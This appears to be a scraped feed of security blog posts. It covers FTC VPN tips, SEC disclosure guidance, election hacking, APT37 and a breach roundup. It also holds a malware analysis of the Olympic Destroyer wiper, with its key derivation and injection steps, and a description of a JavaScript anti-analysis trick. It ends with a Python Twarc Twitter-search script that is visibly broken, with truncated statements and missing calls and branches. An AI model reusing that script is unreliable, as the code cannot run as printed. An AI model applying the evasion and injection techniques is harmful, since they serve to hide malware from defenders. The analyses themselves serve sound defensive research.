  6. IETF RFC 6844 on CAA record: ↩︎

  7. The confusion of critical flag: ↩︎

  8. Wikipedia Support Section: ↩︎

FTC Issues Tips on VPN Apps

On February 22, 2018, the Federal Trade Commission (“FTC”) published a blog post that provides tips on how consumers can use Virtual Private Network (“VPN”) apps to protect their information while in transit over public networks. The FTC notes that some consumers are finding VPN apps helpful in protecting their mobile device traffic over Wi-Fi networks at coffee shops, airports and other locations. Through a VPN app, a user can browse websites and use apps on their mobile devices, still shielding the traffic from prying eyes as it transmits via public networks.

In the blog post, the FTC highlights some of the security and privacy benefits of using VPN apps, such as the encryption of mobile device traffic over public networks and anonymization features that help mask that traffic is being sent directly from a particular user’s device. The post points out, however, some privacy and data security concerns associated with using VPN apps. For example, some VPN apps have been found to not use encryption, to request sensitive and possibly unexpected privileges and to share data with third parties for marketing and analytics purposes. For these reasons, the FTC suggests consumers research the VPN app before using it, and carefully review the app’s terms and conditions and its privacy policy to determine the app’s information sharing practices with third parties. The FTC also recommends that users remain aware that not all VPN apps will encrypt their traffic nor will they make it completely anonymous.

SEC Publishes New Guidance on Public Company Cybersecurity Disclosures

On February 21, 2018, the U.S. Securities and Exchange Commission (“SEC”) published long-awaited cybersecurity interpretive guidance (the “Guidance”). The Guidance marks the first time that the five SEC commissioners, as opposed to agency staff, have provided guidance to U.S. public companies with regard to their cybersecurity disclosure and compliance obligations.

Because the Administrative Procedure Act still requires public notice and comment for any rulemaking, the SEC cannot legally use interpretive guidance to announce new law or policy; therefore, the Guidance is evolutionary, rather revolutionary. Still, it introduces several key topics for public companies, and builds on prior interpretive releases issued by agency staff in the past.

First, the Guidance reiterates public companies’ obligation to disclose material information to investors, particularly when that information concerns cybersecurity risks or incidents. Public companies may be required to make such disclosures in periodic reports in the context of (1) risk factors, (2) management’s discussion and analysis of financial results, (3) the description of the company’s business, (4) material legal proceedings, (5) financial statements, and (6) with respect to board risk oversight. Next, the Guidance addresses two topics not previously addressed by agency staff: the importance of cybersecurity policies and procedures in the context of disclosure controls, and the application of insider trading prohibitions in the cybersecurity context.

The Guidance emphasizes that public companies are not expected to publicly disclose specific, technical information about their cybersecurity systems, nor are they required to disclose potential system vulnerabilities in such detail as to empower threat actors to gain unauthorized access. Nevertheless, the SEC noted that while it may be necessary to cooperate with law enforcement and that ongoing investigation of a cybersecurity incident may affect the scope of disclosure regarding an incident, the mere existence of an ongoing internal or external investigation does not provide a basis for avoiding disclosures of a material cybersecurity incident. The guidance concludes with a reminder that public companies are prohibited in many circumstances from making selective disclosure about cybersecurity matters under SEC Regulation Fair Disclosure.

The Guidance is perhaps most notable for the issues it does not address. In a statement issued coincident with the release of the new guidance, Commissioner Kara Stein expressed disappointment that the Guidance did not go further to highlight four areas where she would have liked to see the SEC seek public comment:

  • rules that address improvements to the board’s risk management framework related to cyber risks and threats;
  • minimum standards to protect investors’ personally identifiable information, and whether such standards should be required for key market participants, such as broker-dealers, investment advisers and transfer agents;
  • rules that would require a public company to provide notice to investors (e.g., a Current Report on Form 8-K) in an appropriate time frame following a cyberattack, and to provide useful disclosure to investors without harming the company competitively; and
  • rules that are more programmatic and that would require a public company to develop and implement cybersecurity-related policies and procedures beyond basic disclosure.

Given the intense public and political interest in cybersecurity disclosure by public companies, we anticipate that this latest guidance will not be the SEC’s final word on this critical issue.

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification &amp; Tracking This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common &hellip; Continue reading Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.

Mueller indictments of Russian cyber criminals put election hacking at top of mind

Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post States Worry About Election Hacking as Midterms Approach appeared first on .

Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While Cisco Talos group, and later Endgame, have recently covered it, we noticed a couple of interesting aspects not previously addressed, we would like to share: its taste for hiding its traces, and the peculiar decryption routine. We also would like to pay attention on how the threat makes use of multiple components to breach the infected system. This knowledge allows us to improve our sandbox to be even more effective against emerging advanced threats, so we would like to share some of them.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browsers credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 (for 64-bit OS), sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf (for 32-bit OS)),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59).
  • a legitimate signed copy of the PsExec utility used for the lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)

A wiper deleting data and logs

The wiper component is responsible for wiping the data from the network shares, but also destroying the attacked system by deleting backups, disabling services (Figure 1), clearing event logs using wevtutil, thereby making the infected machine unusable. The very similar behaviors have been previously observed in other Ransomware/Wiper attacks, including the infamous ones such as BadRabbit and NotPetya.

Disabling Windows services

Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably, to be sure that the spawned thread managed to finish its job), and calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This is to prevent static extraction of the embedded files, thus slowing down the analysis process. Another reason of going “offline” (compared with e.g. the Smoke Loader) is to bypass any network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, they are loaded via the LoadResource API, and decrypted via the MMX/SSE instructions sometimes used by malware to bypass code emulation, this is what we’ve observed while debugging it. In this case, however, the instructions are used to implement AES encryption and MD5 hash function (instead of using standard Windows APIs, such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to MD5 of a hardcoded string “123”, and multiplied by 2.

The algorithms could be also identified by looking at some characteristic constants of

  1. The Rcon array used during the AES key schedule (see figure 2) and,
  2. The MD5 magic initialization constants.

The decrypted resources are then dropped in temporary directory and finally, executed.

Figure 2. AES key setup routine for resources decryption


An interesting aspect of the decryption is its usage of the SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code by searching for the associated codehash, for example. The later is a normalized representation of the code mnemonics included in the function block (see Figure 3) as produced by the Lastline sandbox, and exported as a part of the process snapshots).

Another interesting sample found during our investigation was (sha1: 84aa2651258a702434233a946336b1adf1584c49) with the harvested system credentials belonging to the Atos company, a technical provider of the Pyeongchang games (see here for more details).

Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

Figure 3. Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.

Checking whether the file is terminated or still running

Figure 4. Checking whether the file is terminated or still running

This is done first by calling CreateFileW API and checking whether the sample is still running (as shown in Figure 4); it then overwrites the file with a sequence of 0x00 byte, deletes it via DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.

Shellcode injection in a copy of notepad.exe

Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows how the analysis overview looks like when analyzing the sample discussed in this article:

Analysis overview of the Olympic Destroyer

Figure 6. Analysis overview of the Olympic Destroyer


In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping out data on the network shares, and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We also have shown how Lastline found similar samples related to this attack based on an example of the decryption routine, and how we detect them. This is a perfect example of how the threats are continuously improving making them even stealthier, more difficult to extract and analyze.

Appendix: IoCsdivider-2-white

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a Malware is a great opportunity for Malware analysts, it would increase the chances to understand what the sample really does. Unfortunately it is not always possible figuring out the "real code", sometimes the Malware analyst needs to use tools like disassemblers or debuggers in order to guess the real Malware actions. However when the Sample is implemented by "interpreted code" such as (but not limited to): Java, Javascript, VBS and .NET there are several ways to get a closed look to the "code”.

Unfortunately attackers know what the analysis techniques are and often they implement evasive actions in order to reduce the analyst understanding or to make the overall analysis harder and harder. An evasive technique could be implemented to detect if the code runs over a VM or it could be implemented in order to run the code only on given environments or it could be implemented to avoid debugging connectors or again to evade reverse-engineering operations such as de-obfuscations techniques. Today "post" is about that, I'd like to focus my readers attention on a fun and innovative way to evade reverse-engineering techniques based on Javascript technology.

Javascript is getting day-by-day more important in term of attack vector, it is often used as a dropper stage and its implementation is widely influenced by many flavours and coding styles but as a bottom line, almost every Javascript Malware is obfuscated. The following image shows an example of obfuscated javascript payload (taken from one analysis of mine).

Example: Obfuscated Javascript

As a first step the Malware analyst would try to de-obfuscate such a code by getting into it. Starting from simple "cut and paste" to more powerful "substitution scripts" the analyst would try to rename functions and variables in order to split complexity and to make clear what code sections do. But in Javascript there is a nice way to get the callee function name which could be used to understand if a function name changed over the time. That function is the arguments.callee.caller. By using that function the attacker can create a stack trace where it saves the executed function chaining name list. The attacker would grab function names and use them as the key to dynamically decrypt specific and crafted Javascript code. Using this technique the Attacker would have an implicit control flow integrity because if a function is renamed or if the function order is slightly different from the designed one, the resulting "hash" would be different. If the hash is different the generated key would be different as well and it wont be able to decrypt and to launch specific encrypted code.

But lets take a closer look to what I meant. The following snip shows a clear (not obfuscated) example explaining this technique. I decided to show not obfuscated code up here just to make it simple.

Each internal stage evaluates ( eval() ) a content. On row 21 and 25 the function cow001 and pyth001 evaluates xor decrypted contents. The xor_decrypt function takes two arguments: decoding_key and the payload to be decrypted. Each internal stage function uses as decryption key the name of callee by using the function. If the function name is the "designed one" (the one that the attacker used to encrypt the payload) the encrypted content would be executed with no exceptions. On the other side if the function name is renamed (by meaning has been changed by the analyst for his convenience) the evaluation function would fail and potentially the attacker could trigger a different code path (by using a simple try and catch statement). 

Before launching the Sample in the wild the attacker needs to prepare the "attack path" by developing the malicious Javascript and by obfuscating it. Once the obfuscation took place the attacker needs to use an additional script (such as the following one) to encrypt the payloads according to the obfuscated function names and to replace the newly encrypted payload to the final and encrypted Javascipt file replacing the encrypted payloads with the one encrypted having as a key the encrypted function names.

The attacker is now able to write a Javascript code owning its own control flow. If the attacker iterates such a concept over and over again,  he would block or control the code execution by hitting a complete reverse-engineering evasion technique.
Watch it out and be safe !

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global rasied $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeonchang Olympic’s official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer system’s of Atos, an IT service provider for the Olympics, and then used that  access to perform reconnaissance and eventually spread the destructive wiper malware known as “Olympic Destroyer.”

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, was compromised since at least December 2017, according to VirusTotal samples. The threat actor then used stolen login credentials of Olympics staff in order to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.


Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119 thousand scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresThe U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that congressmen such as democratic Sen. Chuck Schumer and republican representative Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Unsecured PHI Leads to OCR Settlement with Closed Business

On February 13, 2018, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced that it entered into a resolution agreement with the receiver appointed to liquidate the assets of Filefax, Inc. (“Filefax”) in order to settle potential violations of HIPAA. Filefax offered medical record storage, maintenance and delivery services for covered entities, and had gone out of business during the course of OCR’s investigation. 

OCR opened its investigation in February 2015, after receiving an anonymous complaint alleging that on February 6 and 9, 2015, a “dumpster diver” brought medical records obtained from Filefax to a shredding and recycling facility to exchange for cash. OCR’s investigation confirmed that an individual had left medical records containing the protected health information (“PHI”) of approximately 2,150 patients at the shredding and recycling facility. OCR’s investigation concluded that Filefax impermissibly disclosed the PHI by either (1) leaving it in an unlocked truck in the Filefax parking lot, or (2) granting permission to an unauthorized person to remove the PHI from Filefax, and leaving the PHI unsecured outside the Filefax facility.

The resolution agreement required Filefax to pay $100,000 and enter into a corrective action plan, which obligates Filefax’s receiver to properly store and dispose of the remaining medical records found at Filefax’s facility in compliance with HIPAA.

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with, "w", encoding="utf-8") as handle:
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
    print("No search terms provided. Exiting.")

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in
# Output some status as we go, so we know something is happening
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      tweet_count += 1
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
        if interactions is not None:
          for user in interactions:
            mentioned_frequency_dist[user] += 1
            if screen_name not in user_user_graph:
              user_user_graph[screen_name] = {}
            if user not in user_user_graph[screen_name]:
              user_user_graph[screen_name][user] = 1
              user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:

# Iterate through image URLs, fetching each image if we haven't already
      print("Fetching images.")
      pictures_dir = os.path.join(save_dir, "images")
      if not os.path.exists(pictures_dir):
        print("Creating directory: " + pictures_dir)
      for url in all_image_urls:
        m ="^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
        if m is not None:
          filename =
          print("Getting picture from: " + url)
          save_path = os.path.join(pictures_dir, filename)
          if not os.path.exists(save_path):
            response = requests.get(url, stream=True)
            with open(save_path, 'wb') as out_file:
              shutil.copyfileobj(response.raw, out_file)
            del response

# Output a bunch of files containing the data we just gathered
      print("Saving data.")
      json_outputs = {"tweets.json": tweets,
                      "urls.json": url_frequency_dist,
                      "hashtags.json": hashtag_frequency_dist,
                      "influencers.json": influencer_frequency_dist,
                      "mentioned.json": mentioned_frequency_dist,
                      "user_user_graph.json": user_user_graph,
                      "user_hashtag_graph.json": user_hashtag_graph,
                      "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
      for name, dataset in json_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
      csv_outputs = {"user_user_graph.csv": user_user_graph,
                     "user_hashtag_graph.csv": user_hashtag_graph,
                     "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
      for name, dataset in csv_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_csv(dataset, filename)

      text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                      "influencers.txt": influencer_frequency_dist,
                      "mentioned.txt": mentioned_frequency_dist,
                      "urls.txt": url_frequency_dist}
      for name, dataset in text_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_text(dataset, filename)

